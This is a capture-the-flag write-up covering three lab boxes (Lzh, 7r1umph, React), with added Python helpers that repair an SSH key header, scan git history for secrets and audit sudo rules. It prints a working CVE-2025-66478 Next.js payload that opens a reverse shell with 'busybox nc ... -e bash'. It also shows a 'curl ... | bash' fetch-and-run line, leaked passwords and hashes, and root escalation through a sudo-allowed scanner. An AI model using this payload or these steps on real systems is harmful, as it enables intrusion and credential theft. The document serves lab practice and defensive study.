Then test locally: ssh -i /tmp/id_rsa root@localhost

Root obtained.

welcome@Lzh:/tmp$ ssh root@localhost -i /tmp/id_rsa
Linux Lzh 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Apr 12 23:17:27 2025 from 192.168.3.94
root@Lzh:~# id
uid=0(root) gid=0(root) groups=0(root)
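The reason the first three characters had to be b3B is that every OpenSSH-format private key starts with the same 15-byte magic, which base64-encodes to the same 20 characters. As an added example (not from this write-up or the box), the Python below repairs any damaged characters in that fixed prefix, decodes the header to confirm the fix, and reports whether the key is passphrase-protected; the damaged key it runs on is a constructed stand-in, not the real id_rsa.

```python
import base64
import string

# Every OpenSSH-format private key starts with this magic (see PROTOCOL.key in
# the OpenSSH source). 15 bytes encode to exactly 20 base64 characters, so those
# 20 characters are identical for every such key and can be restored without
# knowing anything about the key itself. That is why "???lbnNz" must be "b3BlbnNz".
OPENSSH_MAGIC = b"openssh-key-v1\x00"
KNOWN_PREFIX = base64.b64encode(OPENSSH_MAGIC).decode()   # "b3BlbnNzaC1rZXktdjEA"
BEGIN = "-----BEGIN OPENSSH PRIVATE KEY-----"
END = "-----END OPENSSH PRIVATE KEY-----"
B64_ALPHABET = set(string.ascii_letters + string.digits + "+/=")


def repair_openssh_key(text):
    """Restore damaged characters in the fixed 20-character prefix of a key body.

    Any character among the first 20 that is not valid base64 (e.g. '?') is
    replaced from the known magic; the result is then decoded and checked.
    Returns (repaired_pem_text, cipher_name); cipher_name "none" means the key
    is not passphrase-protected. Raises ValueError if the key cannot be repaired.
    """
    lines = [ln.strip() for ln in text.strip().splitlines()]
    if not lines or lines[0] != BEGIN or lines[-1] != END:
        raise ValueError("not an OpenSSH private key block")
    body = "".join(lines[1:-1])
    head = list(body[:len(KNOWN_PREFIX)])
    for i, ch in enumerate(head):
        if ch not in B64_ALPHABET:
            head[i] = KNOWN_PREFIX[i]
    if "".join(head) != KNOWN_PREFIX:
        # Valid base64 that still disagrees with the magic: the damage is not in
        # the prefix, or this is not an OpenSSH-format key at all.
        raise ValueError("prefix %r does not match the OpenSSH magic" % "".join(head))
    repaired = KNOWN_PREFIX + body[len(KNOWN_PREFIX):]
    raw = base64.b64decode(repaired, validate=True)
    # Header layout after the magic: string ciphername, string kdfname, ...
    # where a string is a 4-byte big-endian length followed by the bytes.
    n = int.from_bytes(raw[15:19], "big")
    cipher = raw[19:19 + n].decode("ascii")
    wrapped = [repaired[i:i + 70] for i in range(0, len(repaired), 70)]
    return "\n".join([BEGIN, *wrapped, END]) + "\n", cipher


def make_damaged_sample():
    """Constructed stand-in for the box's id_rsa: a valid header for an
    unencrypted key followed by filler, with the first three characters replaced
    by '?' exactly as they appeared on the box. Not a usable key."""
    raw = (OPENSSH_MAGIC + b"\x00\x00\x00\x04none"     # ciphername
           + b"\x00\x00\x00\x04none"                   # kdfname
           + b"\x00" * 40)                             # filler, not key material
    body = base64.b64encode(raw).decode()
    body = "???" + body[3:]
    wrapped = [body[i:i + 70] for i in range(0, len(body), 70)]
    return "\n".join([BEGIN, *wrapped, END]) + "\n"


if __name__ == "__main__":
    fixed, cipher = repair_openssh_key(make_damaged_sample())
    print(fixed)                # body now starts with b3BlbnNzaC1rZXktdjEA
    print("cipher:", cipher)    # "none": no passphrase needed
```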

7r1umph

Start the box and run the usual trio again: nmap, dirsearch and a directory scan.

Found:

[19:02:30] 200 -  841B  - /index.php                                        
[19:02:30] 200 - 841B - /index.php/login/
[19:02:30] 200 - 23KB - /info.php
[19:02:36] 403 - 278B - /server-status
[19:02:36] 403 - 278B - /server-status/
[19:02:38] 301 - 312B - /tmp -> http://10.247.102.33/tmp/
[19:02:38] 200 - 403B - /tmp/
[19:02:38] 301 - 315B - /upload -> http://10.247.102.33/upload/
[19:02:38] 200 - 405B - /upload/

There is a file upload point, and the uploaded file also shows up under /tmp, but clicking it returns 404 and the file is gone.

Uploaded files get the suffix dsz appended automatically, so the intended route is a race condition to get the malicious code executed before it is renamed.

7r1umph box penetration test report (Write-up)

Following the article above, get a reverse shell.

└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.247.102.219] from (UNKNOWN) [10.247.102.33] 47452

user

www-data@7r1umph:/home$ find / -type f -perm -4000 2>/dev/null
find / -type f -perm -4000 2>/dev/null
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/su
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/passwd
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/libexec/polkit-agent-helper-1

Nothing useful.

www-data@7r1umph:/home$ cd /opt
cd /opt
www-data@7r1umph:/opt$ ls -al
ls -al
total 56
drwxr-xr-x 2 root root 4096 Apr 12 2025 .
drwxr-xr-x 18 root root 4096 Mar 18 2025 ..
-rw-r--r-- 1 root root 16968 Apr 12 2025 guess
-rw-r--r-- 1 root root 27871 Apr 12 2025 yeyeye.png

Look around: there is a picture.

www-data@7r1umph:/opt$ base64 /opt/yeyeye.png
base64-encode it, then use 随波逐流 to regenerate the picture.

Dorabella Cipher

It decodes to

yecongdong

Trying it over SSH works.

$ python3 -c 'import pty; pty.spawn("/bin/bash")'
welcome@7r1umph:~$

root

welcome@7r1umph:~$ ls
RegView user.txt
welcome@7r1umph:~$ cd Re*
welcome@7r1umph:~/RegView$ ls
poc.txt README.md RegView.sh run.jpg source.txt
welcome@7r1umph:~/RegView$ ll
bash: ll: command not found
welcome@7r1umph:~/RegView$ ls -al
total 476
drwxr-xr-x 3 root root 4096 Apr 12 2025 .
drwx------ 3 welcome welcome 4096 Apr 12 2025 ..
drwxr-xr-x 8 root root 4096 Apr 12 2025 .git
-rw-r--r-- 1 root root 289 Dec 3 2024 poc.txt
-rw-r--r-- 1 root root 936 Apr 12 2025 README.md
-rwxr-xr-x 1 root root 3911 Apr 12 2025 RegView.sh
-rw-r--r-- 1 root root 457296 Dec 3 2024 run.jpg
-rw-r--r-- 1 root root 2095 Dec 3 2024 source.txt
welcome@7r1umph:~/RegView$

There is a .git directory.

git log to view the history:
commit acd806aad21acb61112252234c7707bc8a74dd3c (HEAD -> main)
Author: bamuwe <bamuwe@qq.com>
Date: Sat Apr 12 01:33:50 2025 -0400

fix bug

commit 900b75c25c03c4af30d8d05de61c01c723741ecc
Author: bamuwe <bamuwe@qq.com>
Date: Sat Apr 12 01:32:22 2025 -0400

add source2.txt

A source2.txt file was added in that commit.
git show 900b75c:source2.txt
root:ff855ad811c79e5fba458a575fac5b83
welcome@7r1umph:~/RegView$ su root
Password:
root@7r1umph:/home/welcome/RegView#
Root obtained.
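The source2.txt lesson is that a secret stays in the repository's history after the commit that removes it. As an added example (not from this write-up or the RegView repo), here is a Python scanner over git log -p --all output that reports added lines matching credential-like patterns; the log excerpt and the hash value in it are constructed stand-ins.

```python
import re

# Constructed `git log -p --all` excerpt in the shape of the RegView story: a
# credential file is committed, then removed by a later "fix" commit. The hash
# value is made up; nothing here is taken from the box.
SAMPLE_GIT_LOG = """\
commit acd806aad21acb61112252234c7707bc8a74dd3c
Author: dev <dev@example.invalid>
Date:   Sat Apr 12 01:33:50 2025 -0400

    fix bug

diff --git a/source2.txt b/source2.txt
deleted file mode 100644
--- a/source2.txt
+++ /dev/null
@@ -1 +0,0 @@
-root:0123456789abcdef0123456789abcdef

commit 900b75c25c03c4af30d8d05de61c01c723741ecc
Author: dev <dev@example.invalid>
Date:   Sat Apr 12 01:32:22 2025 -0400

    add source2.txt

diff --git a/source2.txt b/source2.txt
new file mode 100644
--- /dev/null
+++ b/source2.txt
@@ -0,0 +1 @@
+root:0123456789abcdef0123456789abcdef
diff --git a/README.md b/README.md
--- a/README.md
+++ b/README.md
@@ -1 +1,2 @@
 RegView
+Usage: ./RegView.sh
"""

# Patterns worth a look in any added line; deliberately simple and readable.
SECRET_PATTERNS = [
    ("user:md5-hash", re.compile(r"^\w+:[0-9a-f]{32}$")),
    ("user:crypt-hash", re.compile(r"^\w+:\$(?:1|5|6|2[aby]|y)\$")),
    ("assignment", re.compile(r"(?i)(password|passwd|secret|token|api[_-]?key)\s*[=:]\s*\S+")),
    ("private key", re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----")),
]
COMMIT_RE = re.compile(r"^commit ([0-9a-f]{7,40})")
DIFF_RE = re.compile(r"^diff --git a/(\S+) b/(\S+)")


def scan_git_history(log_text):
    """Walk `git log -p` output and report lines ever *added* that look like secrets.

    Deleted lines (prefix '-') are skipped on purpose: a later removal does not
    undo the earlier commit, which still holds the value. Returns a list of
    (commit, file, label, line) tuples in log order.
    """
    findings = []
    commit = path = None
    in_hunk = False
    for line in log_text.splitlines():
        m = COMMIT_RE.match(line)
        if m:
            commit, path, in_hunk = m.group(1), None, False
            continue
        m = DIFF_RE.match(line)
        if m:
            path, in_hunk = m.group(2), False
            continue
        if line.startswith("@@"):
            in_hunk = True
            continue
        if not in_hunk or not line.startswith("+") or line.startswith("+++"):
            continue
        added = line[1:]
        for label, pat in SECRET_PATTERNS:
            if pat.search(added):
                findings.append((commit, path, label, added))
                break
    return findings


if __name__ == "__main__":
    for commit, path, label, text in scan_git_history(SAMPLE_GIT_LOG):
        print("%s %s [%s] %s" % (commit[:7], path, label, text))
```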

React

user

React. Run nmap, dirsearch and gobuster: ports 80, 22 and 3000 come up.

At first I paid no attention to port 3000 and went after port 80; it felt like RCE but nothing came of it. After asking cyl I learned that port 3000 is vulnerable, and it is the earlier CVE-2025-66478.

POST / HTTP/1.1
Host: 10.247.102.188:3000
Next-Action: x
Content-Type: multipart/form-data; boundary=----Boundary
Content-Length: 641

------Boundary
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=encodeURIComponent(process.mainModule.require('child_process').execSync('busybox nc 10.247.102.219 4444 -e bash').toString().trim());;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------Boundary
Content-Disposition: form-data; name="1"

"$@0"
------Boundary
Content-Disposition: form-data; name="2"

[]
------Boundary--

Reverse shell obtained.

curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | bash
Run linpeas to look around: nothing much.
But it does turn up the bot user's password: lMmqr98vg3Ke1Mu4hJwN
Log in.

root

Replaying from a group member's write-up.

Run sudo -l:
bot@React:~$ sudo -l
Matching Defaults entries for bot on React:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User bot may run the following commands on React:
(ALL) NOPASSWD: /opt/react2shell/scanner.py
(ALL) NOPASSWD: /usr/bin/rm -rf /
bot@React:~$
bot@React:~$ head /opt/react2shell/scanner.py
#!/usr/bin/python3
import argparse
import sys
import json
import os
import random
import re
import string
from datetime import datetime, timezone
from concurrent.futures import ThreadPoolExecutor, as_completed
Look at the head of the script.
bot@React:~$ sudo /opt/react2shell/scanner.py
usage: scanner.py [-h] (-u URL | -l LIST) [-t THREADS] [--timeout TIMEOUT]
                [-o OUTPUT] [--all-results] [-k] [-H HEADER] [-v] [-q]
                [--no-color] [--safe-check] [--windows] [--waf-bypass]
                [--waf-bypass-size KB]
scanner.py: error: one of the arguments -u/--url -l/--list is required
See what information it gives.
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | bash

Scanning turns up the binary /usr/bin/check_key.

Look at what is inside it.
bot@React:/tmp$ /usr/bin/check_key --help
bot@React:/tmp$ /usr/bin/check_key -help
bot@React:/tmp$ strings /usr/bin/check_key
/lib64/ld-linux-x86-64.so.2
fopen
fgets
strlen
fclose
system
__cxa_finalize
strcmp
__libc_start_main
libc.so.6
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u/UH
[]A\A]A^A_
/opt/key
cp /root/Reactrootpass.txt /opt
;*3$"
GCC: (Debian 10.2.1-6) 10.2.1 20210110
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.0
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
check_key.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
_edata
fclose@GLIBC_2.2.5
strlen@GLIBC_2.2.5
system@GLIBC_2.2.5
__libc_start_main@GLIBC_2.2.5
fgets@GLIBC_2.2.5
__data_start
strcmp@GLIBC_2.2.5
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
fopen@GLIBC_2.2.5
__TMC_END__
_ITM_registerTMCloneTable
__cxa_finalize@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.gnu.build-id
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got.plt
.data
.bss
.comment

It contains cp /root/Reactrootpass.txt /opt

Read it directly:
bot@React:/tmp$ sudo /opt/react2shell/scanner.py -l /root/Reactrootpass.txt

brought to you by assetnote

[*] Loaded 1 host(s) to scan
[*] Using 10 thread(s)
[*] Timeout: 10s
[*] Using RCE PoC check
[!] SSL verification disabled

[ERROR] To75CuOTHLA7BMmH5Puv
Password obtained.
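Every privilege escalation in these write-ups (steghide on Mao, dirsearch on Search, scanner.py and rm on React) comes down to one sudo rule shape: NOPASSWD on a command that reads or writes files chosen by the caller. As an added example (not from this post or any of these boxes), the Python below audits sudo -l output or sudoers lines for those shapes; the sample input is assembled from the outputs shown above, and the risk notes are my own assumptions about each tool.

```python
import os
import re

# Commands whose ordinary options read or write caller-chosen files. Allowed as
# root through sudo, each becomes an arbitrary-file read/write as root. The two
# entries are the ones abused above: steghide on Mao, dirsearch on Search.
FILE_CAPABLE = {
    "steghide": "-ef embeds any readable file, -xf/-sf extract it to any path",
    "dirsearch": "-w/-l read any file (echoed in the log), --log/-o write any path",
}

# "(ALL) NOPASSWD: /usr/bin/steghide"        as printed by `sudo -l`
SUDO_L_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*?)\s*$")
# "lingmj ALL=(ALL:ALL) NOPASSWD:ALL"          as written in sudoers / sudoers.d
SUDOERS_RE = re.compile(
    r"^\s*(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*?)\s*$")

# Sample input assembled from the sudo -l outputs shown in this post.
SAMPLE_SUDO_L = """\
User lingmj may run the following commands on Mao:
  (ALL) NOPASSWD: /usr/bin/steghide
  (ALL : ALL) NOPASSWD: ALL
User www-data may run the following commands on Search:
  (7r1umphk) NOPASSWD: /usr/local/bin/dirsearch
User bot may run the following commands on React:
  (ALL) NOPASSWD: /opt/react2shell/scanner.py
  (ALL) NOPASSWD: /usr/bin/rm -rf /
"""
SAMPLE_SUDOERS = "lingmj ALL=(ALL:ALL) NOPASSWD:ALL\n"


def rule_risk(runas, cmd):
    """Return a short risk note for a sudo command spec, or None if nothing stands out."""
    toks = cmd.split()
    base = os.path.basename(toks[0])
    if cmd == "ALL":
        return "unrestricted: any command as %s" % runas
    if base in FILE_CAPABLE:
        return "arbitrary file access via %s (%s)" % (base, FILE_CAPABLE[base])
    if base == "rm" and "/" in toks[1:] and any(t.startswith("-") and "r" in t for t in toks[1:]):
        return "destructive: recursive delete of /"
    if base.endswith((".py", ".sh", ".pl")):
        return "custom script as %s: audit every path or file option it accepts" % runas
    return None


def audit_sudo_rules(text):
    """Scan `sudo -l` output or sudoers-format lines and return the risky rules.

    Each finding records the run-as spec, the command, whether a password is
    required, and the risk note. Lines matching neither format are ignored.
    """
    findings = []
    for line in text.splitlines():
        m = SUDOERS_RE.match(line) or SUDO_L_RE.match(line)
        if not m:
            continue
        runas = m.group("runas").replace(" ", "")
        cmd = m.group("cmd")
        risk = rule_risk(runas, cmd)
        if risk:
            findings.append({"runas": runas, "cmd": cmd,
                             "nopasswd": "NOPASSWD" in m.group("tags"), "risk": risk})
    return findings


if __name__ == "__main__":
    for f in audit_sudo_rules(SAMPLE_SUDO_L + SAMPLE_SUDOERS):
        print("%-12s %-30s %s" % ("(%s)" % f["runas"], f["cmd"], f["risk"]))
```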